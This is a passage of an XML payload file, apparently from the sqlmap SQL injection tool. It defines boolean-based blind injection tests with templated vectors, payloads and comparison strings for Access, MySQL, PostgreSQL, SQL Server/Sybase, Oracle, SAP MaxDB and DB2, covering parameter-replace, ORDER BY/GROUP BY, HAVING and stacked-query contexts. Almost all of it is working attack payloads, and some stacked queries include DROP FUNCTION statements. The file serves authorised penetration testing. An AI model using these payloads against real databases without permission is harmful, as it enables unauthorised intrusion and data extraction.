boolean-based blind - Parameter replace</title>966<stype>1</stype>967<level>3</level>968<risk>1</risk>969<clause>1,3</clause>970<where>3</where>971<vector>IIF([INFERENCE],[RANDNUM],1/0)</vector>972<request>973<payload>IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>974</request>975<response>976<comparison>IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>977</response>978<details>979<dbms>Microsoft Access</dbms>980</details>981</test>982983<test>984<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>985<stype>1</stype>986<level>4</level>987<risk>1</risk>988<clause>1,3</clause>989<where>3</where>990<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>991<request>992<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>993</request>994<response>995<comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>996</response>997<details>998<dbms>Microsoft Access</dbms>999</details>1000</test>10011002<!-- Works in MySQL, Oracle, etc. -->1003<test>1004<title>Boolean-based blind - Parameter replace (DUAL)</title>1005<stype>1</stype>1006<level>2</level>1007<risk>1</risk>1008<clause>1,2,3</clause>1009<where>3</where>1010<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>1011<request>1012<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>1013</request>1014<response>1015<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>1016</response>1017</test>10181019<test>1020<title>Boolean-based blind - Parameter replace (DUAL - original value)</title>1021<stype>1</stype>1022<level>3</level>1023<risk>1</risk>1024<clause>1,2,3</clause>1025<where>3</where>1026<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>1027<request>1028<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>1029</request>1030<response>1031<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>1032</response>1033</test>1034<!-- End of boolean-based blind tests - Parameter replace -->10351036<!-- Works in SAP MaxDB, Informix, etc. -->1037<test>1038<title>Boolean-based blind - Parameter replace (CASE)</title>1039<stype>1</stype>1040<level>2</level>1041<risk>1</risk>1042<clause>1,3</clause>1043<where>3</where>1044<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>1045<request>1046<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>1047</request>1048<response>1049<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>1050</response>1051</test>10521053<test>1054<title>Boolean-based blind - Parameter replace (CASE - original value)</title>1055<stype>1</stype>1056<level>3</level>1057<risk>1</risk>1058<clause>1,3</clause>1059<where>3</where>1060<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>1061<request>1062<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>1063</request>1064<response>1065<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>1066</response>1067</test>1068<!-- End of boolean-based blind tests - Parameter replace -->10691070<!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->1071<test>1072<title>MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>1073<stype>1</stype>1074<level>2</level>1075<risk>1</risk>1076<clause>2,3</clause>1077<where>1</where>1078<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>1079<request>1080<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>1081</request>1082<response>1083<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>1084</response>1085<details>1086<dbms>MySQL</dbms>1087<dbms_version>>= 5.0</dbms_version>1088</details>1089</test>10901091<test>1092<title>MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>1093<stype>1</stype>1094<level>3</level>1095<risk>1</risk>1096<clause>2,3</clause>1097<where>1</where>1098<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>1099<request>1100<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>1101</request>1102<response>1103<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>1104</response>1105<details>1106<dbms>MySQL</dbms>1107<dbms_version>>= 5.0</dbms_version>1108</details>1109</test>11101111<test>1112<title>MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>1113<stype>1</stype>1114<level>3</level>1115<risk>1</risk>1116<clause>2,3</clause>1117<where>1</where>1118<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>1119<request>1120<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>1121</request>1122<response>1123<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>1124</response>1125<details>1126<dbms>MySQL</dbms>1127<dbms_version>< 5.0</dbms_version>1128</details>1129</test>11301131<test>1132<title>MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>1133<stype>1</stype>1134<level>4</level>1135<risk>1</risk>1136<clause>2,3</clause>1137<where>1</where>1138<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>1139<request>1140<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>1141</request>1142<response>1143<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>1144</response>1145<details>1146<dbms>MySQL</dbms>1147<dbms_version>< 5.0</dbms_version>1148</details>1149</test>11501151<test>1152<title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title>1153<stype>1</stype>1154<level>2</level>1155<risk>1</risk>1156<clause>2,3</clause>1157<where>1</where>1158<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>1159<request>1160<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>1161</request>1162<response>1163<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>1164</response>1165<details>1166<dbms>PostgreSQL</dbms>1167</details>1168</test>11691170<!-- It exclusively works with ORDER BY -->1171<test>1172<title>PostgreSQL boolean-based blind - ORDER BY clause (original value)</title>1173<stype>1</stype>1174<level>4</level>1175<risk>1</risk>1176<clause>3</clause>1177<where>1</where>1178<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>1179<request>1180<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>1181</request>1182<response>1183<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>1184</response>1185<details>1186<dbms>PostgreSQL</dbms>1187</details>1188</test>11891190<!--1191TODO: this would work for GROUP BY too if sqlmap did not enclose string-based [ORIGVALUE] with single quotes, but then other payloads would break.1192It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is1193-->1194<test>1195<!-- <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause (GENERATE_SERIES - original value)</title> -->1196<title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>1197<stype>1</stype>1198<level>5</level>1199<risk>1</risk>1200<!-- <clause>2,3</clause> -->1201<clause>3</clause>1202<where>1</where>1203<vector>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>1204<request>1205<payload>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>1206</request>1207<response>1208<comparison>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>1209</response>1210<details>1211<dbms>PostgreSQL</dbms>1212</details>1213</test>12141215<test>1216<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>1217<stype>1</stype>1218<level>3</level>1219<risk>1</risk>1220<clause>3</clause>1221<where>1</where>1222<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>1223<request>1224<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>1225</request>1226<response>1227<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>1228</response>1229<details>1230<dbms>Microsoft SQL Server</dbms>1231<dbms>Sybase</dbms>1232</details>1233</test>12341235<test>1236<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title>1237<stype>1</stype>1238<level>4</level>1239<risk>1</risk>1240<clause>3</clause>1241<where>1</where>1242<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>1243<request>1244<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>1245</request>1246<response>1247<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>1248</response>1249<details>1250<dbms>Microsoft SQL Server</dbms>1251<dbms>Sybase</dbms>1252</details>1253</test>12541255<test>1256<title>Oracle boolean-based blind - ORDER BY, GROUP BY clause</title>1257<stype>1</stype>1258<level>3</level>1259<risk>1</risk>1260<clause>2,3</clause>1261<where>1</where>1262<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>1263<request>1264<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>1265</request>1266<response>1267<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>1268</response>1269<details>1270<dbms>Oracle</dbms>1271</details>1272</test>12731274<test>1275<title>Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>1276<stype>1</stype>1277<level>4</level>1278<risk>1</risk>1279<clause>2,3</clause>1280<where>1</where>1281<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>1282<request>1283<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>1284</request>1285<response>1286<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>1287</response>1288<details>1289<dbms>Oracle</dbms>1290</details>1291</test>12921293<test>1294<title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title>1295<stype>1</stype>1296<level>4</level>1297<risk>1</risk>1298<clause>2,3</clause>1299<where>1</where>1300<vector>,IIF([INFERENCE],1,1/0)</vector>1301<request>1302<payload>,IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>1303</request>1304<response>1305<comparison>,IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>1306</response>1307<details>1308<dbms>Microsoft Access</dbms>1309</details>1310</test>13111312<test>1313<title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>1314<stype>1</stype>1315<level>5</level>1316<risk>1</risk>1317<clause>2,3</clause>1318<where>1</where>1319<vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>1320<request>1321<payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>1322</request>1323<response>1324<comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>1325</response>1326<details>1327<dbms>Microsoft Access</dbms>1328</details>1329</test>13301331<test>1332<title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title>1333<stype>1</stype>1334<level>4</level>1335<risk>1</risk>1336<clause>2,3</clause>1337<where>1</where>1338<vector>,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)</vector>1339<request>1340<payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)</payload>1341</request>1342<response>1343<comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)</comparison>1344</response>1345<details>1346<dbms>SAP MaxDB</dbms>1347</details>1348</test>13491350<test>1351<title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>1352<stype>1</stype>1353<level>5</level>1354<risk>1</risk>1355<clause>2,3</clause>1356<where>1</where>1357<vector>,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>1358<request>1359<payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>1360</request>1361<response>1362<comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>1363</response>1364<details>1365<dbms>SAP MaxDB</dbms>1366</details>1367</test>13681369<test>1370<title>IBM DB2 boolean-based blind - ORDER BY clause</title>1371<stype>1</stype>1372<level>4</level>1373<risk>1</risk>1374<clause>3</clause>1375<where>1</where>1376<vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>1377<request>1378<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>1379</request>1380<response>1381<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>1382</response>1383<details>1384<dbms>IBM DB2</dbms>1385</details>1386</test>13871388<test>1389<title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title>1390<stype>1</stype>1391<level>5</level>1392<risk>1</risk>1393<clause>3</clause>1394<where>1</where>1395<vector>,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>1396<request>1397<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>1398</request>1399<response>1400<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>1401</response>1402<details>1403<dbms>IBM DB2</dbms>1404</details>1405</test>14061407<!-- Works in MySQL, Oracle, etc. -->1408<test>1409<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>1410<stype>1</stype>1411<level>3</level>1412<risk>1</risk>1413<clause>1,2</clause>1414<where>1</where>1415<vector>HAVING [INFERENCE]</vector>1416<request>1417<payload>HAVING [RANDNUM]=[RANDNUM]</payload>1418</request>1419<response>1420<comparison>HAVING [RANDNUM]=[RANDNUM1]</comparison>1421</response>1422</test>1423<!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->14241425<!-- Boolean-based blind tests - Stacked queries -->1426<test>1427<title>MySQL >= 5.0 boolean-based blind - Stacked queries</title>1428<stype>1</stype>1429<level>4</level>1430<risk>1</risk>1431<clause>1-8</clause>1432<where>1</where>1433<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>1434<request>1435<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>1436<comment>#</comment>1437</request>1438<response>1439<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>1440</response>1441<details>1442<dbms>MySQL</dbms>1443<dbms_version>>= 5.0</dbms_version>1444</details>1445</test>14461447<test>1448<title>MySQL < 5.0 boolean-based blind - Stacked queries</title>1449<stype>1</stype>1450<level>5</level>1451<risk>1</risk>1452<clause>1-8</clause>1453<where>1</where>1454<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>1455<request>1456<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>1457<comment>#</comment>1458</request>1459<response>1460<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>1461</response>1462<details>1463<dbms>MySQL</dbms>1464<dbms_version>< 5.0</dbms_version>1465</details>1466</test>14671468<test>1469<title>PostgreSQL boolean-based blind - Stacked queries</title>1470<stype>1</stype>1471<level>3</level>1472<risk>1</risk>1473<clause>1-8</clause>1474<where>1</where>1475<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>1476<request>1477<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>1478<comment>--</comment>1479</request>1480<response>1481<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>1482</response>1483<details>1484<dbms>PostgreSQL</dbms>1485</details>1486</test>14871488<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->1489<test>1490<title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>1491<stype>1</stype>1492<level>5</level>1493<risk>1</risk>1494<clause>1-8</clause>1495<where>1</where>1496<vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>1497<request>1498<payload>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>1499<comment>--</comment>1500</request>1501<response>1502<comparison>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>1503</response>1504<details>1505<dbms>PostgreSQL</dbms>1506</details>1507</test>15081509<test>1510<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>1511<stype>1</stype>1512<level>3</level>1513<risk>1</risk>1514<clause>1-8</clause>1515<where>1</where>1516<vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>1517<request>1518<payload>;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>1519<comment>--</comment>1520</request>1521<response>1522<comparison>;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>1523</response>1524<details>1525<dbms>Microsoft SQL Server</dbms>1526<dbms>Sybase</dbms>1527</details>1528</test>15291530<test>1531<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>1532<stype>1</stype>1533<level>4</level>1534<risk>1</risk>1535<clause>1-8</clause>1536<where>1</where>1537<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</vector>1538<request>1539<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</payload>1540<comment>--</comment>1541</request>1542<response>1543<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</comparison>1544</response>1545<details>1546<dbms>Microsoft SQL Server</dbms>1547<dbms>Sybase</dbms>1548</details>1549</test>15501551<test>1552<title>Oracle boolean-based blind - Stacked queries</title>1553<stype>1</stype>1554<level>4</level>1555<risk>1</risk>1556<clause>1-8</clause>1557<where>1</where>1558<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>1559<request>1560<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>1561<comment>--</comment>1562</request>1563<response>1564<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>1565</response>1566<details>1567<dbms>Oracle</dbms>1568</details>1569</test>15701571<test>1572<title>Microsoft Access boolean-based blind - Stacked queries</title>1573<stype>1</stype>1574<level>5</level>1575<risk>1</risk>1576<clause>1-8</clause>1577<where>1</where>1578<vector>;IIF([INFERENCE],1,1/0)</vector>1579<request>1580<payload>;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>1581<comment>%16</comment>1582</request>1583<response>1584<comparison>;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>1585</response>1586<details>1587<dbms>Microsoft Access</dbms>1588</details>1589</test>15901591<test>1592<title>SAP MaxDB boolean-based blind - Stacked queries</title>1593<stype>1</stype>1594<level>5</level>1595<risk>1</risk>1596<clause>1-8</clause>1597<where>1</where>1598<vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>1599<request>1600<payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>1601<comment>--</comment>1602</request>1603<response>1604<comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>1605</response>1606<details>1607<dbms>SAP MaxDB</dbms>1608</details>1609</test>1610<!-- End of boolean-based blind tests - Stacked queries -->1611</root>161216131614